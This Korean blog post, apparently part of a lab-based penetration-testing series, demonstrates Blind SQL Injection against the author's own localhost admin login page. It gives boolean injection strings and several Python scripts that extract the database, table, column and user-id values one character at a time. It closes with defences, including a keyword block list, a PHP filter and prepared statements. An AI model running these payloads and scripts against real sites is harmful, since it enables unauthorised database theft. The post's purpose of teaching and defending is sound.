Blind SQL Injection
공격 원리
|
1. SQL Injection 공격 가능 여부 확인 2. 데이터 개수 확인(Table, Column, Data) 3. 데이터 문자열 1개씩 추출 4. 데이터 1개 추출 5. 모든 데이터 추출 6. 원하는 데이터 추출 |
논리 연산자를 이용해 True인 쿼리문과 False인 쿼리문의 결과를 비교하여 정보를 추출하는 공격입니다. AND 연산자를 사용해 논리가 맞지 않을 때 출력되는 데이터와 참일 때 출력되는 데이터를 비교하여 공격할 수 있습니다. 공격 과정은 다음과 같습니다.
취약 코드 구현
SQL Injection에 사용했던 관리자 로그인 페이지에서 실습한다. 관리자 로그인 php 코드는 gomguk.tistory.com/58 에서 확인할 수 있다.
공격 실습
|
No. |
실습 위치 |
비고 |
|
1 |
관리자 로그인 |
Step1.SQL Injection이 가능한 폼에 참인 쿼리문을 작성했을 때 로그인이 동작함을 확인한다.
입력 구문: ‘or 1=1#
Step2. SQL Injection이 가능한 폼에 거짓인 쿼리문을 작성했을 때 로그인이 불가능함을 확인한다.
입력 구문 : ‘or 1=0#
Step3. 참인 쿼리문과 거짓인 쿼리문의 결과가 다른 것을 확인할 수 있으며 이를 이용해 Blind SQL Injection을 시도할 수 있다. 다음 과정으로 데이터베이스의 길이를 구한다. Burp의 Intruder 기능을 사용하거나 자동화 스크립트 작성을 통해 추출할 수 있다.
입력 구문 : ' or 1=1 and length(database())>1#
공격을 위해 파이썬 스크립트를 작성하여 공격을 자동화하였다.
import requests
URL = "localhost/adminlogin.php"
for cnt in range(1, 255):
sqlquery = "' or 1=1 and length(database())=" + str(cnt) + "# "
postquery = "username=" + sqlquery + "&password=1&form=submit"
res = requests.post(url=URL, data=postquery, headers={'Content-Type': 'application/x-www-form-urlencoded'})
if "SUCCESS" in res.text:
print(f"done! DB LENGTH : {cnt}")
break
Step 4.스크립트 실행 결과는 다음과 같다. DB의 길이는 7임을 확인할 수 있다.
Step 5. DB 이름을 알아내기 위해 공격 SQL Injection 구문을 사용한다. 입력한 구문은 DB의 첫 번째 글자가 ‘Z’인지 확인한다. ascii() 함수를 이용하여 범위를 줄여나가면서 탐색한다.
입력 구문: ‘or 1=1 and ascii(substring(database(), 1,1))<=90#
공격에 사용한 코드는 다음과 같다.
import requests
URL = "http://localhost/adminlogin.php"
min = 48 # '1'
max = 122 # 'z'
DB_LEN = 7
dbname = []
for idx in range(1, DB_LEN+1):
for cnt in range(min, max+1):
sqlquery = "' or 1=1 and ascii(substring(database()," + str(idx) + ",1))<=" + str(cnt) + "# "
postquery = "username=" + sqlquery + "&password=1&form=submit"
res = requests.post(url=URL, data=postquery, headers={'Content-Type': 'application/x-www-form-urlencoded'})
if "SUCCESS" in res.text:
print(f"Catch one! {cnt}")
dbname.append(chr(cnt))
break
print(f"DONE! DB name is {dbname}")
Step 6. 추출한 데이터베이스 명으로 테이블 이름의 길이를 추출한다. information_schema 데이터베이스의 tables테이블에서 이름을 추출하고, 메타데이터 테이블을 제외한 테이블 중 table_schema가 ‘myuser’ 데이터베이스인 테이블을 추출한다. 그 테이블의 길이가 9인지 여부를 확인하고 참, 거짓에 따른 결과를 판단하여 숫자를 변경하며 반복하여 시도한다.
입력 구문 : ' or 1=1 and length((select table_name from information_schema.tables where table_type='base table' and table_schema='myuser1' limit 0,1))=9#
Step 7.Burp의 Intruder 기능을 이용한 결과 응답 값의 길이가 다른 요청의 확인을 통해 테이블 길이를 확인한다.
Step 8. Step7에서 확인한 테이블 길이를 이용하여 테이블 명을 추출한다. 각각의 테이블 명을 조회할 수 있으며 한 글자씩 조회해야 하므로 서버 환경에 따라 오랜 시간이 걸릴 수 있다.
입력구문: ' or 1=1 and ascii(substring((select table_name from information_schema.tables where table_type='base table' and table_schema='myuser1' limit 0,1),1,1)) >= 90#
공격에 사용한 코드는 다음과 같다.
import requests
URL = "http://localhost/adminlogin.php"
min = 48 # '1'
max = 122 # 'z'
TABLE_LEN = 6
tablename = []
for idx in range(1, TABLE_LEN+1):
for cnt in range(min, max+1):
sqlquery = "' or 1=1 and ascii(substring((select table_name from information_schema.tables where table_type='base table' and table_schema='myuser1' limit 0,1),"+str(idx)+",1)) <= "+ str(cnt) +"# "
postquery = "username=" + sqlquery + "&password=1&form=submit"
res = requests.post(url=URL, data=postquery, headers={'Content-Type': 'application/x-www-form-urlencoded'})
if "SUCCESS" in res.text:
print(f"Catch one! {cnt}")
tablename.append(chr(cnt))
break
print(f"DONE! TABLE name is {tablename}")
Step 9.테이블 명을 추출한 방법대로 컬럼 수를 추출하고 컬럼 명을 추출한다.
입력구문: ' or 1=1 and length((select column_name from information_schema.columns where table_name='member' limit 0,1))=1#
각 컬럼명의 길이를 정리하면 다음과 같다.
|
컬럼 순서 |
컬럼명 길이 |
|
1 |
3 |
|
2 |
2 |
|
3 |
2 |
|
4 |
4 |
|
5 |
7 |
|
6 |
3 |
|
7 |
5 |
Step 10.테이블 명 추출 방법과 마찬가지로 ascii() 함수와 substring()함수를 이용하여 각 칼럼명을 추출한다.
입력구문 : ' or 1=1 and ascii(substring((select column_name from information_schema.columns where table_name='member' limit 0,1),1,1)) = 105#
import requests
URL = "http://localhost/adminlogin.php"
min = 48 # '1'
max = 122 # 'z'
column_LEN = [3,2,2,4,7,3,5] # length of each column
colname = []
for i in range(len(column_LEN)):
result = ""
for idx in range(1, column_LEN[i]+1):
for cnt in range(min, max+1):
sqlquery = "' or 1=1 and ascii(substring((select column_name from information_schema.columns where table_name='member' limit "+ str(i) + ",1),"+ str(idx) +",1)) = "+ str(cnt) +"# "
postquery = "username=" + sqlquery + "&password=1&form=submit"
res = requests.post(url=URL, data=postquery, headers={'Content-Type': 'application/x-www-form-urlencoded'})
if "SUCCESS" in res.text:
print(f"Catch one! {cnt}")
result = result + chr(cnt)
break
colname.append(result)
print(f"col name is {colname}")
Step11.추출한 컬럼 명을 이용해 각 컬럼 별 데이터의 길이를 확인할 수 있다.
입력구문: ' or 1=1 and length((select id from member limit 0,1))=6#
Step12. 추출한 컬럼 별 데이터 길이를 이용하여 데이터를 추출할 수 있다.
입력구문: ' or 1=1 and ascii(substring((select id from member limit 0, 1),1,1)) >= 97#
Step11~12에서 사용한 코드는 다음과 같다.
import requests
URL = "http://localhost/adminlogin.php"
min = 48 # '1'
max = 122 # 'z'
num_min = 1
num_max = 255
colname = []
result = ""
data=[]
for idx in range(0, 6):
for cnt in range(num_min , num_max+1):
sqlquery = "' or 1=1 and length((select id from member limit "+ str(idx) +",1))="+str(cnt)+"# "
postquery = "username=" + sqlquery + "&password=1&form=submit"
res = requests.post(url=URL, data=postquery, headers={'Content-Type': 'application/x-www-form-urlencoded'})
if "SUCCESS" in res.text:
print(f"Catch one! {cnt}")
colname.append(cnt)
break
print(f"col name_length is {colname}")
for index in range(len(colname)):
result = ""
for j in range(1, colname[index]+1):
for cnt in range(min, max+1):
sqlquery = "' or 1=1 and ascii(substring((select id from member limit "+ str(index) +", 1),"+ str(j) +",1)) ="+ str(cnt) + "# "
postquery = "username=" + sqlquery + "&password=1&form=submit"
res = requests.post(url=URL, data=postquery, headers={'Content-Type': 'application/x-www-form-urlencoded'})
if "SUCCESS" in res.text:
result = result + chr(cnt)
break
data.append(result)
print(f"data : {data}")
Blind SQL Injection을 통해 사용자의 데이터를 추출할 수 있다. Blind SQL Injection 공격 시 데이터 별 길이를 먼저 알아야 하고 한 글자씩 추출해야 하므로 테이블의 모든 데이터를 추출하는 데 오랜 시간이 소요된다다. 이는 탐색알고리즘 적용 등을 통해 개선될 수 있다.
해당 사이트는 사용자 입력 값 검증이 미흡한 점과 에러 페이지 노출, 동적 쿼리 사용으로 인해 SQL Injection이 가능함을 확인하였니다. 보안 대책으로는 입력 값 검증과 예외처리, Prepared Statement를 사용하여 SQL Injection공격을 방지할 수 있다.
SQL Injection 보안 대책
입력 값 검증
사용자의 입력 값이 DB Query에 동적으로 영향을 주는 경우 입력된 값이 개발자가 의도한 값인지 검증합니다.
/*, -, ‘, “, ?, #, (, ), ;, @, =, *, +, union, select, drop, update, from, where, join, substr, user_tables, user_table_columns, information_schema, sysobject, table_schema, declare, dual,…
위와 같은 의도하지 않은 입력 값에 대해 검증하고 차단해야 합니다.
예시) PHP에서의 입력 값 검증
UserInput = preg_replace(“/[\r\n\s\t\’\;\”\=\-\-\#\/*]+/”,“”, $UserInput);
if(preg_match(‘/(union|select|from|where)/i’, $UserInput)) {
$this–>Error_popup(‘No SQL-Injection’);
}저장 프로시저 사용
저장 프로시저는 사용하고자 하는 쿼리에 대해 미리 형식을 지정하는 것을 말합니다. 지정된 형식 데이터가 아니면 쿼리가 실행되지 않습니다.
if(ctype_digit($_POST[‘uId’]) && is_int($_POST[‘uId’])) {
$validateduId = $_POST[‘uId’];
$pdo = new PDO(‘mysql:store.db’);
$stmt = $pdo–>prepare(‘SELECT * FROM tb_user WHERE user_id = :uId’);
$stmt–>bindParam(‘:uId’, $validateduId, PDO::PARAM_INT);
$stmt–>execute();
} else {
// reject id value
}
서버 보안 적용
최소한의 권한으로 DB를 운영하고, 사용하지 않는 저장 프로시저와 내장함수를 제거하거나 권한을 제어합니다. 목적에 따라 쿼리의 권한을 수정하며 공용 시스템 객체에도 접근 제어를 통해 관리합니다. 신뢰할 수 있는 네트워크, 서버에 대해서만 접근을 허용하고 에러메시지가 웹페이지에 노출되지 않도록 설정합니다.
'Security > WEB' 카테고리의 다른 글
| [모의해킹 실습] Stored XSS 취약 페이지 구현 및 공격 실습 2 (4) | 2021.07.13 |
|---|---|
| [모의해킹 실습] XSS 취약 페이지 구현 및 공격 실습 (0) | 2021.07.10 |
| [모의해킹 실습] Union SQL Injection 게시판 구현 및 공격실습 2 (0) | 2021.05.25 |
| [모의해킹 실습] SQL Injection 게시판 구현 및 공격실습 1 (2) | 2021.05.11 |
| [모의해킹] 실습환경 구성하기 (0) | 2021.05.04 |